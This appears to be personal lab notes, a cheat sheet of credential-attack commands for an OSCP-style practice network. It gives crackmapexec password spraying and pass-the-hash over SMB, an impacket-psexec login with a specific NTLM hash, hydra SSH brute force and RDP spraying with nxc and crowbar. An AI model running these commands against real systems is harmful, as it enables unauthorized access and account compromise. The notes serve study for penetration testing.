
SMB:
```
crackmapexec smb internalip -u joe -d MEDTECH.COM -p "Flowers1"

with list of user, ips and hasheson smb

crackmapexec smb ips -u username -H hashes --continue-on-success

if you find some hit, login w
impacket-psexec medtech.com/yoshi@172.16.219.82 -hashes :fdf36048c1cf88f5630381c5e38feb8e 
```
SSH:
```
hydra -l offsec -P /usr/share/seclists/Passwords/500-worst-passwords.txt 192.168.177.122 ssh 
```
RDP:
```
nxc rdp 172.16.x.12 -u users.txt -p passwords.txt --continue-on-success --rdp-timeout 30
OR
crowbar -b rdp -s 192.168.227.191/32 -U username -C passwords
```
